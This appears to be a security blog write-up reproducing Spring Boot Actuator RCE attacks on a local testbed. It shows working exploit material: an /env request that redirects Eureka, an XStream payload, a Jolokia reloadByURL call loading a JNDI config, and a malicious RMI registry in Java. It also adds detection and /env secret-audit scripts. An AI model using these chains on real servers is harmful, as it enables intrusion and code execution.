Spring Actuator attack method analysis notes

0x00 Reproduction notes

The author of the original article has already provided a vulnerable environment: https://github.com/artsploit/actuator-testbed. Just run it; the error messages can be ignored.

1. Attack method one – RCE via the Eureka component

Spring Actuator exposes the /env endpoint for viewing and changing the application's environment properties. That is how the eureka.client.serviceUrl.defaultZone property comes into play. Points to note:

  • When hitting /env, copy the request below and adjust the details; editing a request captured from the browser tends to cause problems.
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 74

eureka.client.serviceUrl.defaultZone=http://127.0.0.1:8081/java/xstreampoc

The XStream payload (needs further analysis):

<linked-hash-set>
<jdk.nashorn.internal.objects.NativeString>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
</is>
</dataSource>
</dataHandler>
</value>
</jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>
  • The XStream payload must be served with the Content-Type header set to application/xml (I configured this with nginx). The actual request goes to the /java/xstreampoc/apps/ route.
  • Use /env to check whether the environment property was actually changed.

2. Attack method two – XXE to RCE via the Jolokia component

Internally the XML file is parsed with SAX, so XXE is possible.
JNDI injection is involved here; the payload looks like this:

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8081!/jndi_poc.xml

Contents of jndi_poc.xml:

<configuration>
<insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/evilObject" as="appName" />
</configuration>

The JNDI attack code on the RMI server side (for the limitations of the two approaches, see the reference articles):

/**
* Dependency:
* - Tomcat 8 (embedded in Spring Boot), which ships the Java EL package.
*/
public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1097");
Registry registry = LocateRegistry.createRegistry(1097);

//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));

ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("evilObject", referenceWrapper);
}

With the JConsole tool you can see the MBeans inside JMX and look for exploitable spots. In essence, the attack uses the Jolokia component to drive MBeans under JMX. See https://jolokia.org/reference/html/protocol.html
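The two request shapes in sections 1 and 2 (the /env override that points eureka.client.serviceUrl.defaultZone at a remote host, and the Jolokia reloadByURL call whose URL argument is written with Jolokia's `!/` escaping) are easy to pick out of reverse-proxy or WAF logs. The script below is an added detection example, not code from the original post or from any project it references. It runs over a few constructed request records (method, path, form body) that mirror the requests shown above, decodes the Jolokia path escaping, and grades what it finds. The record format, the property and operation lists, and the `trusted_hosts` parameter are this example's own assumptions.

```python
"""Flag the two actuator abuse patterns from the post in request logs.

Added example (not from the original post). Input records are a constructed
stand-in for what a reverse proxy or WAF logs: method, path and form body.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Spring Boot 1.x exposes /env and /jolokia at the root; 2.x under /actuator.
ENV_PATH = re.compile(r"^/(?:actuator/)?env/?$")
JOLOKIA_EXEC = re.compile(r"^/(?:actuator/)?jolokia/exec/(?P<rest>.+)$")

# Properties that, once overridden through /env, make the application fetch
# and parse remote content. The post shows the Eureka one; extend as needed.
REMOTE_FETCH_PROPERTIES = {"eureka.client.serviceUrl.defaultZone"}

# MBean operations that load configuration from a caller-supplied URL.
URL_LOADING_OPERATIONS = {"reloadByURL"}


def jolokia_unescape(segment: str) -> str:
    """Undo Jolokia GET-URL escaping: '!/' stands for '/' and '!!' for '!'."""
    out, i = [], 0
    while i < len(segment):
        if segment[i] == "!" and i + 1 < len(segment):
            out.append(segment[i + 1])
            i += 2
        else:
            out.append(segment[i])
            i += 1
    return "".join(out)


def split_jolokia_path(rest: str) -> list:
    """Split the text after /jolokia/exec/ on unescaped '/' only, then unescape.

    Returns [mbean, operation, arg1, arg2, ...].
    """
    parts, cur, i = [], [], 0
    while i < len(rest):
        if rest[i] == "!" and i + 1 < len(rest):   # escaped pair: keep together
            cur.append(rest[i:i + 2])
            i += 2
        elif rest[i] == "/":                       # real separator
            parts.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(rest[i])
            i += 1
    parts.append("".join(cur))
    return [jolokia_unescape(p) for p in parts]


def is_untrusted_url(value: str, trusted_hosts) -> bool:
    """True for any absolute URL whose host is not explicitly trusted."""
    parts = urlsplit(value)
    return bool(parts.scheme) and parts.hostname not in trusted_hosts


def analyse(record: dict, trusted_hosts=()) -> list:
    """Return [(severity, message), ...] for one request record."""
    findings = []
    method, path = record["method"].upper(), record["path"]

    if ENV_PATH.match(path) and method == "POST":
        for key, values in parse_qs(record.get("body", "")).items():
            for value in values:
                if key in REMOTE_FETCH_PROPERTIES and is_untrusted_url(value, trusted_hosts):
                    findings.append(("high", f"/env points {key} at external {value}"))
                else:
                    findings.append(("medium", f"/env runtime write of {key}"))

    m = JOLOKIA_EXEC.match(path)
    if m:
        parts = split_jolokia_path(m.group("rest"))
        mbean = parts[0]
        operation = parts[1] if len(parts) > 1 else ""
        urls = [a for a in parts[2:] if is_untrusted_url(a, trusted_hosts)]
        if operation in URL_LOADING_OPERATIONS and urls:
            findings.append(("high", f"jolokia {operation} on {mbean} loads {urls[0]}"))
        else:
            findings.append(("low", f"jolokia exec of {operation} on {mbean}"))
    return findings


def scan(records, trusted_hosts=()) -> list:
    """Run analyse() over many records; returns (index, severity, message)."""
    return [(i, sev, msg) for i, r in enumerate(records)
            for sev, msg in analyse(r, trusted_hosts)]


# Constructed records mirroring the requests shown in the post, plus benign noise.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/env",
     "body": "eureka.client.serviceUrl.defaultZone=http://127.0.0.1:8081/java/xstreampoc"},
    {"method": "GET", "path": "/jolokia/exec/ch.qos.logback.classic:Name=default,"
     "Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/"
     "http:!/!/127.0.0.1:8081!/jndi_poc.xml"},
    {"method": "GET", "path": "/env"},
    {"method": "POST", "path": "/env", "body": "logging.level.root=DEBUG"},
    {"method": "GET", "path": "/jolokia/read/java.lang:type=Memory"},
]

if __name__ == "__main__":
    for idx, severity, message in scan(SAMPLE_REQUESTS):
        print(f"[{severity}] request #{idx}: {message}")
```

The Jolokia decoder is the part worth keeping: because `/` inside an argument is written as `!/`, a plain substring search for the loaded URL misses it, whereas splitting on unescaped slashes first and then unescaping each segment recovers `http://127.0.0.1:8081/jndi_poc.xml`. Disabling or authenticating the env and jolokia endpoints removes the exposure; the log check is for catching attempts against instances that still have them.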

3. Sensitive information leakage

Looking carefully at endpoints such as /trace and /env may reveal private data belonging to users and to the application.
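The /env endpoint masks values only by key name: Spring Boot's default keys-to-sanitize list (password, secret, key, token, .*credentials.*, vcap_services) is matched against the property key, so a password embedded in a JDBC URL, or an AWS access key stored under a key such as accessKeyId, comes back in clear. The script below is an added example, not code from the original post; it walks a constructed /env document in the Boot 1.x shape, applies the same key-matching rule Spring's sanitizer uses, and reports values that leak anyway. The sample document and the value regexes are this example's own assumptions.

```python
"""Audit an actuator /env response for secrets that key-name masking misses.

Added example (not from the original post). SAMPLE_ENV is a constructed
document in the Spring Boot 1.x /env shape (property sources as top-level keys).
"""
import json
import re

# Spring Boot's default keys-to-sanitize entries. A plain word matches keys that
# END with it (case-insensitive); an entry containing regex characters is used as-is.
DEFAULT_KEYS_TO_SANITIZE = ["password", "secret", "key", "token",
                            ".*credentials.*", "vcap_services"]
MASK = "******"

# Value shapes that are sensitive no matter what the key is called.
VALUE_PATTERNS = {
    "credential embedded in URL query": re.compile(r"(?i)(?:password|pwd)=[^&;\s]+"),
    "user:password@host in URL": re.compile(r"://[^/\s:@]+:[^/\s@]+@"),
    "AWS access key id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "JWT": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\."),
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def compile_sanitize_patterns(keys):
    """Mirror Spring's rule: regex if it contains * $ ^ +, else '.*<word>$'."""
    compiled = []
    for item in keys:
        if any(ch in item for ch in "*$^+"):
            compiled.append(re.compile(item, re.IGNORECASE))
        else:
            compiled.append(re.compile(".*" + re.escape(item) + "$", re.IGNORECASE))
    return compiled


def would_be_masked(key, patterns):
    """True if the default Sanitizer would replace this key's value with the mask."""
    return any(p.fullmatch(key) for p in patterns)


def iter_properties(env):
    """Yield (source, key, value) for every leaf in a Boot 1.x style /env document."""
    for source, props in env.items():
        if isinstance(props, dict):
            for key, value in props.items():
                yield source, key, value


def audit_env(env, keys_to_sanitize=DEFAULT_KEYS_TO_SANITIZE):
    """Return [(source, key, reason)] for values a caller of /env could read."""
    patterns = compile_sanitize_patterns(keys_to_sanitize)
    findings = []
    for source, key, value in iter_properties(env):
        if not isinstance(value, str) or value == MASK:
            continue
        if would_be_masked(key, patterns):
            # The key name is on the sanitize list yet the value is in clear:
            # sanitization was disabled or the list was overridden.
            findings.append((source, key, "sensitive key name returned unmasked"))
            continue
        for label, pattern in VALUE_PATTERNS.items():
            if pattern.search(value):
                findings.append((source, key, f"{label} under a key the default mask does not cover"))
                break
    return findings


# Constructed sample; the masked entries show what the default sanitizer does cover.
SAMPLE_ENV = json.loads("""
{
  "profiles": [],
  "systemEnvironment": {
    "PATH": "/usr/bin:/bin",
    "DB_PASSWORD": "******"
  },
  "applicationConfig: [classpath:/application.properties]": {
    "spring.datasource.url": "jdbc:mysql://db.internal:3306/app?user=app&password=changeme",
    "spring.datasource.password": "******",
    "app.service.token": "abc123",
    "aws.accessKeyId": "AKIAIOSFODNN7EXAMPLE",
    "server.port": "8090"
  }
}
""")

if __name__ == "__main__":
    for source, key, reason in audit_env(SAMPLE_ENV):
        print(f"{source}: {key} -> {reason}")
```

Run against a real /env capture, the three kinds of hit are the ones to act on: a sanitize-listed key returned in clear means sanitization was turned off, a credential inside a URL means the key-based mask never applied, and an access key under a non-matching name means the list needs extending (in Boot 1.x via `endpoints.env.keys-to-sanitize`). The better fix for a reachable /env is not to expose it at all (`endpoints.env.enabled=false`) or to keep `management.security.enabled=true` so it requires authentication.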

0x01 RCE attack principles (ToDo)

Attack method one: at its core this is an XStream deserialization problem. Historically XStream has had many deserialization issues that need no third-party packages; for detailed analysis, look at the attack vectors in https://github.com/mbechler/marshalsec. Attack method two: to be explored, the fundamental difference at the source-code level between JRMP and JNDI injection attacks.

0x02 Reference links

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
https://xz.aliyun.com/t/2233
https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Author: angelwhu
Article link: https://www.angelwhu.com/paper/2019/03/08/spring-actuator-attack-mode-analysis-record/
Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit angelwhu_blog.